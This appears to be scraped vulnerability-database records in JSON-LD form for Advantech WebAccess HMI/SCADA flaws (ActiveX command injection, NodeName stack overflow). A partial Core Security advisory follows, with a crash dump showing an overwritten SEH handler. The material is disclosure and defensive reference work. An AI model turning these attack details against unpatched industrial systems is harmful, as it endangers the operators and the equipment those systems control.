"@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.1, "url": "https://ics-cert.us-cert.gov/advisories/icsa-14-261-01" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/69536" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0991" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-0991" }, { "trust": 0.6, "url": "http://cxsecurity.com/issue/wlb-2014090006" }, { "trust": 0.6, "url": "http://osvdb.com/show/osvdb/110686" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0987" }, { "trust": 0.1, "url": "http://corelabs.coresecurity.com/" }, { "trust": 0.1, "url": "http://webaccess.advantech.com/." }, { "trust": 0.1, "url": "http://www.coresecurity.com." }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0988" }, { "trust": 0.1, "url": "http://www.zerodayinitiative.com/advisories/published/." }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0992" }, { "trust": 0.1, "url": "http://www.coresecurity.com/advisories/advantech-webaccess-vulnerabilities" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0989" }, { "trust": 0.1, "url": "https://github.com/coresecurity/sentinel." }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0991" }, { "trust": 0.1, "url": "http://www.coresecurity.com/files/attachments/core_security_advisories.asc." }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0990" }, { "trust": 0.1, "url": "http://corelabs.coresecurity.com." }, { "trust": 0.1, "url": "http://webaccess.advantech.com/downloads_software.php" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0986" }, { "trust": 0.1, "url": "http://support.microsoft.com/kb/2458544." }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0985" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2014-05417" }, { "db": "VULHUB", "id": "VHN-68484" }, { "db": "JVNDB", "id": "JVNDB-2014-004358" }, { "db": "PACKETSTORM", "id": "128120" }, { "db": "CNNVD", "id": "CNNVD-201409-738" }, { "db": "NVD", "id": "CVE-2014-0991" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "3a306310-1ec1-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "d278c6b4-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-05417" }, { "db": "VULHUB", "id": "VHN-68484" }, { "db": "BID", "id": "69536" }, { "db": "JVNDB", "id": "JVNDB-2014-004358" }, { "db": "PACKETSTORM", "id": "128120" }, { "db": "CNNVD", "id": "CNNVD-201409-738" }, { "db": "NVD", "id": "CVE-2014-0991" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-09-05T00:00:00", "db": "IVD", "id": "3a306310-1ec1-11e6-abef-000c29c66e3d" }, { "date": "2014-09-05T00:00:00", "db": "IVD", "id": "d278c6b4-2351-11e6-abef-000c29c66e3d" }, { "date": "2014-09-05T00:00:00", "db": "CNVD", "id": "CNVD-2014-05417" }, { "date": "2014-09-20T00:00:00", "db": "VULHUB", "id": "VHN-68484" }, { "date": "2014-09-02T00:00:00", "db": "BID", "id": "69536" }, { "date": "2014-09-24T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-004358" }, { "date": "2014-09-02T22:28:11", "db": "PACKETSTORM", "id": "128120" }, { "date": "2014-09-22T00:00:00", "db": "CNNVD", "id": "CNNVD-201409-738" }, { "date": "2014-09-20T10:55:04.213000", "db": "NVD", "id": "CVE-2014-0991" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-12-29T00:00:00", "db": "CNVD", "id": "CNVD-2014-05417" }, { "date": "2015-08-05T00:00:00", "db": "VULHUB", "id": "VHN-68484" }, { "date": "2014-09-22T18:05:00", "db": "BID", "id": "69536" }, { "date": "2014-09-24T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-004358" }, { "date": "2014-09-22T00:00:00", "db": "CNNVD", "id": "CNNVD-201409-738" }, { "date": "2024-11-21T02:03:10.597000", "db": "NVD", "id": "CVE-2014-0991" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201409-738" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess Vulnerable to stack-based buffer overflow", "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-004358" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Buffer overflow", "sources": [ { "db": "IVD", "id": "3a306310-1ec1-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "d278c6b4-2351-11e6-abef-000c29c66e3d" }, { "db": "CNNVD", "id": "CNNVD-201409-738" } ], "trust": 1.0 } }
var-201404-0548
Vulnerability from variot
The CreateProcess method in the BWOCXRUN.BwocxrunCtrl.1 ActiveX control in bwocxrun.ocx in Advantech WebAccess before 7.2 allows remote attackers to execute (1) setup.exe, (2) bwvbprt.exe, and (3) bwvbprtl.exe programs from arbitrary pathnames via a crafted argument, as demonstrated by a UNC share pathname. Supplementary information : CWE Vulnerability type by CWE-77: Improper Neutralization of Special Elements used in a Command ( Command injection ) Has been identified. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the bwocxrun.ocx. The control exposes a scriptable method 'CreateProcess'. An attacker can exploit a flaw in the validation code within the method to execute arbitrary commands in the context of the browser. Advantech WebAccess HMI/SCADA is an HMI/SCADA software. Attackers can exploit this issue to bypass security restrictions allowing attackers to run arbitrary command lines; this may aid in launching further attacks. Advantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201404-0548", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "eq", "trust": 1.6, "vendor": "advantech", "version": "5.0" }, { "model": "webaccess", "scope": "eq", "trust": 1.6, "vendor": "advantech", "version": "7.0" }, { "model": "webaccess", "scope": "eq", "trust": 1.6, "vendor": "advantech", "version": "6.0" }, { "model": "webaccess", "scope": "eq", "trust": 1.2, "vendor": "advantech", "version": "7.1" }, { "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "7.1" }, { "model": "webaccess", "scope": "lt", "trust": 0.8, "vendor": "advantech", "version": "7.2" }, { "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null }, { "model": null, "scope": "eq", "trust": 0.6, "vendor": "advantech webaccess", "version": "5.0" }, { "model": null, "scope": "eq", "trust": 0.6, "vendor": "advantech webaccess", "version": "6.0" }, { "model": null, "scope": "eq", "trust": 0.6, "vendor": "advantech webaccess", "version": "7.0" }, { "model": null, "scope": "eq", "trust": 0.6, "vendor": "advantech webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "704a2dd2-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "16b76f4c-2352-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "7d7bcc5f-463f-11e9-aa10-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-14-139" }, { "db": "CNVD", "id": "CNVD-2014-02268" }, { "db": "JVNDB", "id": "JVNDB-2014-001983" }, { "db": "CNNVD", "id": "CNNVD-201404-178" }, { "db": "NVD", "id": "CVE-2014-0773" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-001983" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-14-139" } ], "trust": 0.7 }, "cve": "CVE-2014-0773", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2014-0773", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 2.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2014-02268", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "704a2dd2-1edf-11e6-abef-000c29c66e3d", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "16b76f4c-2352-11e6-abef-000c29c66e3d", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "7d7bcc5f-463f-11e9-aa10-000c29342cb1", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "VHN-68266", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2014-0773", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2014-0773", "trust": 0.8, "value": "High" }, { "author": "ZDI", "id": "CVE-2014-0773", "trust": 0.7, "value": "HIGH" }, { "author": "CNVD", "id": "CNVD-2014-02268", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201404-178", "trust": 0.6, "value": "HIGH" }, { "author": "IVD", "id": "704a2dd2-1edf-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "HIGH" }, { "author": "IVD", "id": "16b76f4c-2352-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "HIGH" }, { "author": "IVD", "id": "7d7bcc5f-463f-11e9-aa10-000c29342cb1", "trust": 0.2, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-68266", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "704a2dd2-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "16b76f4c-2352-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "7d7bcc5f-463f-11e9-aa10-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-14-139" }, { "db": "CNVD", "id": "CNVD-2014-02268" }, { "db": "VULHUB", "id": "VHN-68266" }, { "db": "JVNDB", "id": "JVNDB-2014-001983" }, { "db": "CNNVD", "id": "CNNVD-201404-178" }, { "db": "NVD", "id": "CVE-2014-0773" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The CreateProcess method in the BWOCXRUN.BwocxrunCtrl.1 ActiveX control in bwocxrun.ocx in Advantech WebAccess before 7.2 allows remote attackers to execute (1) setup.exe, (2) bwvbprt.exe, and (3) bwvbprtl.exe programs from arbitrary pathnames via a crafted argument, as demonstrated by a UNC share pathname. Supplementary information : CWE Vulnerability type by CWE-77: Improper Neutralization of Special Elements used in a Command ( Command injection ) Has been identified. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the bwocxrun.ocx. The control exposes a scriptable method \u0027CreateProcess\u0027. An attacker can exploit a flaw in the validation code within the method to execute arbitrary commands in the context of the browser. Advantech WebAccess HMI/SCADA is an HMI/SCADA software. \nAttackers can exploit this issue to bypass security restrictions allowing attackers to run arbitrary command lines; this may aid in launching further attacks. \nAdvantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment", "sources": [ { "db": "NVD", "id": "CVE-2014-0773" }, { "db": "JVNDB", "id": "JVNDB-2014-001983" }, { "db": "ZDI", "id": "ZDI-14-139" }, { "db": "CNVD", "id": "CNVD-2014-02268" }, { "db": "BID", "id": "66742" }, { "db": "IVD", "id": "704a2dd2-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "16b76f4c-2352-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "7d7bcc5f-463f-11e9-aa10-000c29342cb1" }, { "db": "VULHUB", "id": "VHN-68266" } ], "trust": 3.69 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2014-0773", "trust": 4.7 }, { "db": "ICS CERT", "id": "ICSA-14-079-03", "trust": 3.1 }, { "db": "CNNVD", "id": "CNNVD-201404-178", "trust": 1.3 }, { "db": "CNVD", "id": "CNVD-2014-02268", "trust": 1.2 }, { "db": "BID", "id": "66742", "trust": 1.0 }, { "db": "JVNDB", "id": "JVNDB-2014-001983", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-2095", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-14-139", "trust": 0.7 }, { "db": "OSVDB", "id": "105571", "trust": 0.6 }, { "db": "SECUNIA", "id": "57873", "trust": 0.6 }, { "db": "IVD", "id": "704A2DD2-1EDF-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "IVD", "id": "16B76F4C-2352-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "IVD", "id": "7D7BCC5F-463F-11E9-AA10-000C29342CB1", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-68266", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "704a2dd2-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "16b76f4c-2352-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "7d7bcc5f-463f-11e9-aa10-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-14-139" }, { "db": "CNVD", "id": "CNVD-2014-02268" }, { "db": "VULHUB", "id": "VHN-68266" }, { "db": "BID", "id": "66742" }, { "db": "JVNDB", "id": "JVNDB-2014-001983" }, { "db": "CNNVD", "id": "CNNVD-201404-178" }, { "db": "NVD", "id": "CVE-2014-0773" } ] }, "id": "VAR-201404-0548", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "704a2dd2-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "16b76f4c-2352-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "7d7bcc5f-463f-11e9-aa10-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2014-02268" }, { "db": "VULHUB", "id": "VHN-68266" } ], "trust": 1.73470696 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 1.2 } ], "sources": [ { "db": "IVD", "id": "704a2dd2-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "16b76f4c-2352-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "7d7bcc5f-463f-11e9-aa10-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2014-02268" } ] }, "last_update_date": "2024-11-23T21:45:11.643000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Downloads ::: WebAccess Software", "trust": 0.8, "url": "http://webaccess.advantech.com/downloads.php?item=software" }, { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://www.advantech.co.jp/products/GF-1M94V/Advantech-WebAccess/mod_B975C492-56B3-4EBA-8BBB-5B6D3483EE9D.aspx" }, { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 0.7, "url": "https://ics-cert.us-cert.gov/advisories/ICSA-14-079-03" }, { "title": "Advantech WebAccess bwocxrun.ocx CreateProcess method remote command execution vulnerability patch", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/44791" } ], "sources": [ { "db": "ZDI", "id": "ZDI-14-139" }, { "db": "CNVD", "id": "CNVD-2014-02268" }, { "db": "JVNDB", "id": "JVNDB-2014-001983" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "NVD-CWE-Other", "trust": 1.0 }, { "problemtype": "CWE-Other", "trust": 0.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-001983" }, { "db": "NVD", "id": "CVE-2014-0773" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.8, "url": "http://ics-cert.us-cert.gov/advisories/icsa-14-079-03" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0773" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-0773" }, { "trust": 0.6, "url": "http://osvdb.com/show/osvdb/105571" }, { "trust": 0.6, "url": "http://secunia.com/advisories/57873" } ], "sources": [ { "db": "ZDI", "id": "ZDI-14-139" }, { "db": "CNVD", "id": "CNVD-2014-02268" }, { "db": "VULHUB", "id": "VHN-68266" }, { "db": "JVNDB", "id": "JVNDB-2014-001983" }, { "db": "CNNVD", "id": "CNNVD-201404-178" }, { "db": "NVD", "id": "CVE-2014-0773" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "704a2dd2-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "16b76f4c-2352-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "7d7bcc5f-463f-11e9-aa10-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-14-139" }, { "db": "CNVD", "id": "CNVD-2014-02268" }, { "db": "VULHUB", "id": "VHN-68266" }, { "db": "BID", "id": "66742" }, { "db": "JVNDB", "id": "JVNDB-2014-001983" }, { "db": "CNNVD", "id": "CNNVD-201404-178" }, { "db": "NVD", "id": "CVE-2014-0773" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-04-11T00:00:00", "db": "IVD", "id": "704a2dd2-1edf-11e6-abef-000c29c66e3d" }, { "date": "2014-04-11T00:00:00", "db": "IVD", "id": "16b76f4c-2352-11e6-abef-000c29c66e3d" }, { "date": "2014-04-11T00:00:00", "db": "IVD", "id": "7d7bcc5f-463f-11e9-aa10-000c29342cb1" }, { "date": "2014-05-19T00:00:00", "db": "ZDI", "id": "ZDI-14-139" }, { "date": "2014-04-11T00:00:00", "db": "CNVD", "id": "CNVD-2014-02268" }, { "date": "2014-04-12T00:00:00", "db": "VULHUB", "id": "VHN-68266" }, { "date": "2014-04-08T00:00:00", "db": "BID", "id": "66742" }, { "date": "2014-04-15T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-001983" }, { "date": "2014-04-16T00:00:00", "db": "CNNVD", "id": "CNNVD-201404-178" }, { "date": "2014-04-12T04:37:31.707000", "db": "NVD", "id": "CVE-2014-0773" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-05-19T00:00:00", "db": "ZDI", "id": "ZDI-14-139" }, { "date": "2014-04-11T00:00:00", "db": "CNVD", "id": "CNVD-2014-02268" }, { "date": "2014-04-14T00:00:00", "db": "VULHUB", "id": "VHN-68266" }, { "date": "2014-04-08T00:00:00", "db": "BID", "id": "66742" }, { "date": "2014-04-15T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-001983" }, { "date": "2014-04-16T00:00:00", "db": "CNNVD", "id": "CNNVD-201404-178" }, { "date": "2024-11-21T02:02:47.030000", "db": "NVD", "id": "CVE-2014-0773" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201404-178" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess bwocxrun.ocx CreateProcess Method Remote Command Execution Vulnerability", "sources": [ { "db": "IVD", "id": "704a2dd2-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "16b76f4c-2352-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "7d7bcc5f-463f-11e9-aa10-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2014-02268" } ], "trust": 1.2 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Command injection", "sources": [ { "db": "IVD", "id": "704a2dd2-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "16b76f4c-2352-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "7d7bcc5f-463f-11e9-aa10-000c29342cb1" } ], "trust": 0.6 } }
var-201409-0439
Vulnerability from variot
Stack-based buffer overflow in Advantech WebAccess (formerly BroadWin WebAccess) 7.2 allows remote attackers to execute arbitrary code via the NodeName parameter. Advantech WebAccess is an IE-based HMI/SCADA monitoring software featuring all engineering projects, database setup, drawing and software management using standard browsers over the internet or intranet. A buffer overflow vulnerability exists in Advantech WebAccess. An attacker exploits a vulnerability to execute arbitrary code in the context of an affected application or to crash the entire application. Advantech WebAccess is prone to a stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer. Failed exploit attempts will likely cause a denial-of-service condition. Advantech WebAccess 7.2 is vulnerable; other versions may also be affected. Advantech WebAccess is a browser-based HMI/SCADA software developed by Advantech. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/
Advantech WebAccess Vulnerabilities
-
Advisory Information
Title: Advantech WebAccess Vulnerabilities Advisory ID: CORE-2014-0005 Advisory URL: http://www.coresecurity.com/advisories/advantech-webaccess-vulnerabilities Date published: 2014-09-02 Date of last update: 2014-09-01 Vendors contacted: Advantech Release mode: User release
-
Vulnerability Description
Advantech WebAccess [1] is a browser-based software package for human-machine interfaces HMI, and supervisory control and data acquisition SCADA.
-
WebAccess 7.2 .
-
Non-vulnerable packages
. AdvantechWebAccessUSANode_20140730_3.4.3
-
Vendor Information, Solutions and Workarounds
Advantech has addressed the vulnerability in WebAccess by issuing an update located at http://webaccess.advantech.com/downloads_software.php
Given that this is a client-side vulnerability, affected users should avoid opening untrusted '.html' files. Core Security also recommends those affected use third party software such as Sentinel [4] or EMET [3] that could help to prevent the exploitation of affected systems to some extent.
-
Credits
This vulnerability was discovered and researched by Ricardo Narvaja from Core Security Exploit Writers Team.
Core Security Advisories Team would also like to thank ICS-CERT Coordination Center for their assistance during the vulnerability reporting process.
/-----
EAX 03A39942 ASCII "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB..." ECX 0162B720 EDX 01630000 xpsp2res.01630000 EBX 0162B720 ESP 0162B454 EBP 0162B460 ESI 0162B4D8 EDI 03A31E98 EIP 064EA6D4 webvact.064EA6D4
-----/
/-----
SEH chain of thread 000016CC Address SE handler 0162DB40 42424242
-----/
-
Report Timeline . 2014-05-06: Core Security notifies Advantech of the vulnerability. Publication date is set for May 26th, 2014. 2014-05-09: CORE asks for a reply. 2014-05-26: First release date missed. 2014-05-26: Core Security notifies that the issues were reported 2 weeks ago and there was no reply since May 6th, 2014. 2014-05-29: Core Security contacts the ICS-CERT for assistance in order to coordinate the disclosure of the advisory. 2014-05-29: ICS-CERT acknowledges Core Security e-mail, and asks for a technical description of the vulnerability. 2014-05-29: Core Security sends technical details to the ICS-CERT. 2014-06-05: ICS-CERT team notifies that they have contacted the vendor and that they will notify us once the vendor has validated the vulnerabilities. 2014-06-18: ICS-CERT team notifies that the vendor is working in a new release, expected to be released in September, and ask if Core Security is 